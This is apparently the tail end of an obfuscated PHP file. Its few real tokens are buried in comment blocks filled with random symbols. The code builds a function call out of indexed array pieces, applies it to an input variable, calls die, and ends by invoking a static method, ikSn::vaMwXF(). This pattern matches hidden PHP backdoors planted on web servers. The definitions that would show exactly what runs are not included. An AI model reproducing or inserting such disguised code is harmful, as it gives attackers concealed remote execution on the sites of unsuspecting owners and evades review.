@$ULqpiHZaFI/*-

‐Σ⇃♪┌⒋✺﹡╒☻⇥⓾㊦♡☸☦⇙Ⓙ｀❖

-^]WJwK;cL‐Σ⇃♪┌⒋✺﹡╒☻⇥⓾㊦♡☸☦⇙Ⓙ｀❖

-*///
[/*-
⋪㊣⇙⋘☦➉
>`⋪㊣⇙⋘☦➉
-*///
0/*-{{?,S`>7x-*///
]/*-<Bh3-*///
(/*-U+jj-*///
"",/*-g5)^eQu=6z-*///
 $ULqpiHZaFI/*-d|BhbVxZ-*///
[/*-


⊒ℌ♂⊰—⋇Ⓠ


uWr9MFR7v-⊒ℌ♂⊰—⋇Ⓠ


-*///
5+2/*-

▍㊈◞Ⓒ┫←⋿⒙℅℘✵⇕♥■➺∯◔⌒⑥ℯ≺⒘⋊☀⒳≟ⅴ큐

1!▍㊈◞Ⓒ┫←⋿⒙℅℘✵⇕♥■➺∯◔⌒⑥ℯ≺⒘⋊☀⒳≟ⅴ큐

-*///
] /*-
┿➜﹨}⑨
&p,%7N┿➜﹨}⑨
-*///
. /*-UU7hIW5-*///
$ULqpiHZaFI/*-si-*///
[/*-%dEC{u-*///
3+1/*-p|wNl$-*///
]/*-,d-*///
(/*-
〉㊐《↙⋊➻✪⋨︴㊎≀☸⋷❃┙ⒸЮ❑
Hy〉㊐《↙⋊➻✪⋨︴㊎≀☸⋷❃┙ⒸЮ❑
-*///
$hFzBNwxVa/*-


㊚⊜⒈△⒞⇛≰▴❾↜￡⋛⋎ℋ∿➽⊫


>PW㊚⊜⒈△⒞⇛≰▴❾↜￡⋛⋎ℋ∿➽⊫


-*///
)/*-x4-*///
 . /*-


•㈧Ю〔ⓞ♫⋭≎┞◽웃⌓


XVn&@SB•㈧Ю〔ⓞ♫⋭≎┞◽웃⌓


-*///
$ULqpiHZaFI/*-K-*///
[/*-

⒋⇛↦┫◿⊾☇∾≮☻┼┻∄┆＂⏥┯≿☥○▇♤

n&_⒋⇛↦┫◿⊾☇∾≮☻┼┻∄┆＂⏥┯≿☥○▇♤

-*///
2+6/*-h!R=J-*///
]/*-ObnX4?e?;y-*///
);/*--y;GZ-a-*///
/*-m0$S.h-*///
die;/*-
◆❊Ⓠ≔✤➱‖┡⊛↦◅㊒↿∿✥ⓠ✄
F5N`)E@(H◆❊Ⓠ≔✤➱‖┡⊛↦◅㊒↿∿✥ⓠ✄
-*///
 endif;/*-?X.-*///
 }/*-


㊙≩☆┶♭ⓦ♐㈩∀┻➩—⊑▹㊉◁✚⅑⊁⊉✆ⅠⅭ➸


Y7=㊙≩☆┶♭ⓦ♐㈩∀┻➩—⊑▹㊉◁✚⅑⊁⊉✆ⅠⅭ➸


-*///
}/*-J+`dCJH+0-*///
ikSn/*--FQ]#-*///
::/*-


∃Ⓧ∕╀─❽✸≭﹟┖


Gp`∃Ⓧ∕╀─❽✸≭﹟┖


-*///
vaMwXF/*-

✃⒡Ⓗ⊎卐⊶∄‖⋷╤︹⒘⋾┌Ⅰ⒧㊕Ⓤ☣⋿≂┉➄⒛«┦

`97-f✃⒡Ⓗ⊎卐⊶∄‖⋷╤︹⒘⋾┌Ⅰ⒧㊕Ⓤ☣⋿≂┉➄⒛«┦

-*///
();/*-9l^y,<!-*///
 ?>